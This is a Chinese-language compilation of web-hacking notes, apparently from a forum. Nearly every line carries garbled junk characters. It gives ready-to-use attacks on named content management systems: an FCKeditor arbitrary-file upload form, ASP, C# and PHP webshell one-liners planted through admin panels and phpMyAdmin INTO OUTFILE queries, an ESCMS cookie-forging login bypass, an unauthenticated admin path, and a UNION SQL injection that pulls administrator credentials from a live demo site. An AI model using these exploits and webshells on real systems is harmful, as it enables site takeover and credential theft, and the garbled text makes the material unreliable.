# B1 d' }/ C8 A2 f9 shttp://xxoo.com/controls/fckedit ... aspx/connector.aspx7 Y+ J3 j& k( `" @
跳转到网站根目录上传任意文件。
5 y0 ~4 L9 Z7 J9 l2 q2 @, `如果connector.aspx文件被删可用以下exp,copy以下代码另存为html,上传任意文件
+ K& m9 s; @ g0 [! n1 T1 V4 B<form id="frmUpload" enctype="multipart/form-data" action="http://www.xxoo.net/controls/fckeditor/editor/filemanager/upload/aspx/upload.aspx?Type=Media" method="post">
9 G1 {) k. I5 @5 V, m9 u5 |4 a; NUpload a new file:<br>( b5 }' R; g* C ~" J2 `: [+ s, |7 l
<input type="file" name="NewFile" size="50"><br>
: ]3 m* w2 J/ j, |% X; ^9 K<input id="btnUpload" type="submit" value="Upload">8 X" d) F$ e* m2 D
</form>
; I/ X0 }/ a# I( q/ z! R-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------
0 k j4 ^$ a! T3 F5 R0 l) E& u+ _" x0 [
SDcms 后台拿webshell* m# V6 [: e# t: C& V
3 f' V2 J! T/ E: o2 ?- n% E+ j
第一种方法:2 w: }. E7 Y! [& y8 p, A
进入后台-->系统管理-->系统设置-->系统设置->网站名称;
, Y/ x5 c' Y8 F" M6 m1 r E把网站名称内容修改为 "%><%eval request("xxx")' //密码为xxx
- u/ j( @! E7 t: _3 L3 }6 [用菜刀链接http://www.xxx.com/inc/const.asp 就搞定了。
. ]( {+ l; W6 N2 e ~第二种方法:7 L8 a; C: K2 L0 R) d$ T
进入后台-->系统管理-->系统设置-->系统设置->上传设置;
" E7 E6 ~8 K* F K8 E2 z2 R: b在文件类型里面添加一个aaspsp的文件类型,然后找一个上传的地方直接上传asp文件! 注:修改文件类型后不能重复点保存!! F3 ]9 ~+ y) o. J
第三种方法:
0 Q0 J3 ^# [& L进入后台-->界面管理-->模板文件管理-->创建文件+ X" L# s% o, k' j; h
文件名写入getshell.ashx. r* Z1 T( n3 u" X" D G& g0 \; D
内容写入下面内容:2 R0 w9 i, b0 x4 Z0 Y
/====================复制下面的=========================/
' I0 u# b1 I: S& g% C- v9 R3 |# W8 {<%@ WebHandler Language="C#" Class="Handler" %>5 h/ a- w% _8 o7 n
using System;
/ B- }, E6 q1 t5 w: i7 J& F+ i# w" Zusing System.Web;
* F0 ]4 w7 q$ v. w3 J) husing System.IO;! ?0 k1 ?; j" g1 N/ L( y5 u6 a9 g1 K
public class Handler : IHttpHandler {
' W; D: ?" _8 r8 A1 g4 S/ ^public void ProcessRequest (HttpContext context) {
1 x. H( s/ k; I6 B( S+ n/ W6 t% \context.Response.ContentType = "text/plain";2 ]" r- y) h9 ] y; B+ r
StreamWriter file1= File.CreateText(context.Server.MapPath("getshell.asp"));
5 P/ A5 D7 D5 F2 z& Afile1.Write("<%response.clear:execute request(\"xxx\"):response.End%>");
5 x3 j, _0 f+ G; l/ @" q* u# a0 Mfile1.Flush();
7 B" z" E3 @, ~! e% r+ cfile1.Close();
3 d, P: o8 H1 N& x8 N# d+ o& \}
. V0 s& Z ~) }& x C& {public bool IsReusable {4 {& n* H5 C7 T5 G! a3 T5 h
get {+ o. O- ]: ^; D+ u
return false;7 B; e! z" ^( L8 h* `
}) a' z) N9 D% K0 f
}# F0 e4 ]' n; v& G5 m
}
4 O4 U3 D" O7 @0 z5 f* Q/=============================================/
9 ?2 m# ~6 H& F7 Z# l! T访问这个地址:http://www.xxx.com/skins/2009/getshell.ashx
* V6 |; b! |6 Q. x, H* ?0 z" `( e会在http://www.xxx.com/skins/2009/目录下生成getshell.asp 一句话木马 密码为xxx 用菜刀链接2 z6 C+ T, J0 O% v D9 \+ z
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------' W |& P' h! S" z1 L9 e' R1 d
( ^! j6 r0 p" W1 w
ESCMS网站管理系统0day) B7 u% q9 z1 a6 N$ G* c/ G& b
5 h r6 v: J8 Y后台登陆验证是通过admin/check.asp实现的
% c/ \! o1 J4 T& r* |+ @9 o5 A: D, y" e6 M1 ~ @/ k
首先我们打开http://target.com/admin/es_index.html3 y- w r2 M+ i4 p1 y \
然后在COOKIE结尾加上
4 G; r+ N' z* M$ v1 R0 D; ESCMS$_SP2=ES_admin=st0p;
( P( t- L# U: ~* s7 t1 L) L修改,然后刷新( [8 Y+ w, i% y' H+ j# \
进后台了嘎..8 L- d: _& p1 \/ n! z7 I$ ]" P% Y
然后呢…提权,嘿嘿,admin/up2.asp,上传目录参数filepath过滤不严,导致可截断目录,生成SHELL
- c/ F* |* G5 x E I& N7 ?4 D- q! q6 b
利用方法,可以抓包,然后改一下,NC上传,还可以直接用DOMAIN等工具提交.
, ^8 S" A/ s; b v6 C嘿嘿,成功了,shell地址为http://target.com/admin/diy.asp
' w' _( D W3 }, i9 Y8 P% O存在这个上传问题的还有admin/downup.asp,不过好像作者的疏忽,没有引用inc/ESCMS_Config.asp,导致打开此页面失败.." ~. G$ x9 l6 K: ~+ H
在版本ESCMS V1.0 正式版中,同样存在上传问题admin/up2.asp和admin/downup.asp都可利用,只不过cookies欺骗不能用了& b1 M5 E6 \ Y E; h
------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
" `+ D. Q8 a2 J! v/ p$ a) k2 B j1 t( b4 @! h& b, _
宁志网站管理系统后台无验证漏洞及修复
, n- J7 u$ h; |% x) C0 W9 x. u3 c% o* ?, ^/ m/ v
网上搜了一下,好像没有发布.如有雷同纯粹巧合!
3 v. Z* j/ n6 ]3 m官方网站:www.ningzhi.net" t6 @/ B; T3 G! N2 U4 ]
学校网站管理系统 V.2011版本
. T" [, t2 f1 `/ n9 \- bhttp://down.chinaz.com/soft/29943.htm
/ `; G% x; R" i6 r$ o其它版本(如:政府版等),自行下载.4 o# ^: w+ S! s
漏洞说明:后台所有文件竟然都没有作访问验证...相当无语...竟然用的人还很多.汗~~~* f& U! f5 Z& L, I+ A
login.asp代码如下:. D/ z' l6 N6 s
<% response.Write"<script language=javascript>alert('登陆成功!请谨慎操作!谢谢!');this.location.href='manage.asp';</script>" %>
6 ]3 X; T& G+ k/ @manage.asp代码我就不帖出来了.反正也没验证.
% I# P- D7 E" v1 L. f( ~只要访问登陆页就可以成功登陆.....蛋疼~~~ 对此本人表示不理解!
8 a1 ^( T8 Q& S z' T+ U. N3 ]漏洞利用:
3 P$ I' T! T6 N9 c3 n直接访问http://www.0855.tv/admin/manage.asp B+ V: T& ]# r
数据库操作:http://www.0855.tv/admin/manage_web.asp?txt=5&id=web5
1 `8 R& J) _8 ]+ s' f# `% c----------------------------------------------------------------------------------------------------------------------------------------------------------------------------$ m' v9 c, O6 z& }
% H+ w. Q8 O: r6 yphpmyadmin拿shell的四种方法总结及修复" Q4 O; h( c- [
8 V. \7 ^& q% S/ q
方法一:2 W) E! ?8 ]) Z# y) {$ u% a
CREATE TABLE `mysql`.`study` (`7on` TEXT NOT NULL );
% N3 @3 Y8 i& \9 J+ u0 T. J, u' AINSERT INTO `mysql`.`study` (`7on` )VALUES ('<?php @eval($_POST[7on])?>');/ q& W, C1 R9 T5 V. _9 x
SELECT 7onFROM study INTO OUTFILE 'E:/wamp/www/7.php';8 S1 W) Z: Z- J$ J2 {
----以上同时执行,在数据库: mysql 下创建一个表名为:study,字段为7on,导出到E:/wamp/www/7.php, \3 R F( ^& t" l* J, f1 L
一句话连接密码:7on/ B% H7 T3 e7 b/ }. P0 ?
方法二:- C, d& s: _3 l9 ]% L
读取文件内容: select load_file('E:/xamp/www/s.php');
+ h2 F" A ~( d+ P0 m写一句话: select '<?php @eval($_POST[cmd])?>'INTO OUTFILE 'E:/xamp/www/study.php'
( \- M9 U- p) Fcmd执行权限: select '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'' T- @% K9 M3 w; G) \4 x
方法三:1 @9 e( i K. D3 ]+ Z- r9 x% U0 _
JhackJ版本 PHPmyadmin拿shell
+ h$ _+ X. o) j) f, BCreate TABLE study (cmd text NOT NULL);7 e( |! ]4 S) i, r. m2 t8 d* s; g
Insert INTO study (cmd) VALUES('<?php eval($_POST[cmd])?>');, L5 X9 m* g7 Z3 s
select cmd from study into outfile 'E:/wamp/www/7.php';
* z' o& S+ Y* U( m5 v- [4 ?+ `Drop TABLE IF EXISTS study;
) h7 U+ d1 {; ^+ G) s1 x1 w. ~<?php eval($_POST[cmd])?>
! M! ?. e5 z+ y8 ?7 T! `; D8 Y3 VCREATE TABLE study(cmd text NOT NULL );# MySQL 返回的查询结果为空(即零行)。
6 i% {5 L5 b) w. _, v2 K/ `% O: GINSERT INTO study( cmd ) VALUES ('<?php eval($_POST[cmd])?>');# 影响列数: 1& D+ ~3 n ?! D
SELECT cmdFROM study INTO OUTFILE 'E:/wamp/www/7.php';# 影响列数: 19 a9 @+ C0 r$ D
DROP TABLE IF EXISTS study;# MySQL 返回的查询结果为空(即零行)。$ D$ I# `- h7 V! b1 o
方法四:) m5 B& r+ h& j
select load_file('E:/xamp/www/study.php');
- E# I+ e8 R( oselect '<?php echo \'<pre>\';system($_GET[\'cmd\']); echo \'</pre>\'; ?>' INTO OUTFILE 'E:/xamp/www/study.php'/ \+ Y2 G# r+ c0 n% n
然后访问网站目录:http://www.2cto.com/study.php?cmd=dir# u0 t \( s8 o% a8 k4 D( t+ T
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------
" H" I7 w6 E6 }, C$ h. C! @' J' n: T+ @7 C# K+ Z* V
NO.001中学网站管理系统 Build 110628 注入漏洞
( `- W$ l" e( r* K7 m! S' I* n: j+ ]' h! a" p' o
NO.001中学网站管理系统功能模块:
7 N3 G% K1 X3 ?( E* o1.管理员资料:网站的基本信息设置(校长邮箱等),数据库备份,用户管理、部门及权限管理等! f* W8 b! X, z! y" _
2.学校简介:一级分类,可以添加校园简介,领导致辞、校园风光、联系我们。。。等信息. E C- I" o0 f" H7 d
3.文章管理:二级分类,动态添加各相关频道(图片视频频道、学校概况频道除外)文章等信息- D% |, |* L# s5 B: B0 z1 K
4.视频图片管理:一级分类,动态添加视频或者图片等信息
6 H1 v9 w$ {8 k6 i4 N5.留言管理:对留言,修改,删除、回复等管理# i9 w+ r! r' H) `3 h: S
6.校友频道:包括校友资料excel导出、管理等功能
# O$ }) k6 d1 P4 I( N7.友情链接管理:二级分类,能建立不同种类的友情链接显示在首页5 j" s: k' Y6 L' q5 H* c
默认后台:admin/login.asp' G4 U' C d) Y. ~$ E3 o+ Y; j2 O( N
官方演示:http://demo.001cms.net
' l# ]+ F$ e' U! C4 X源码下载地址:http://down.chinaz.com/soft/30187.htm
0 _7 s7 j1 Q4 f# `0 ?EXP:/ R R9 I2 m, N3 O* \& x
union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin7 J! [+ v# o9 M: \
测试:http://demo.001cms.net/shownews.asp?type=新闻动态&stype=校务公开&id=484 union select 1,2,3,a_name,5,6,a_pass,8,9,10,11 from admin
4 k8 ~" w; `9 q* a/ V1 R# m% B4 sgetshell:后台有备份,你懂的- |1 p) L6 Z# d! E" n. ?* [& y
另:FCK编辑器有几处可利用.大家自己行挖掘,由于相关内容较多,我在这里就不说了。
. p) s2 y' J. u! e" d! L------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |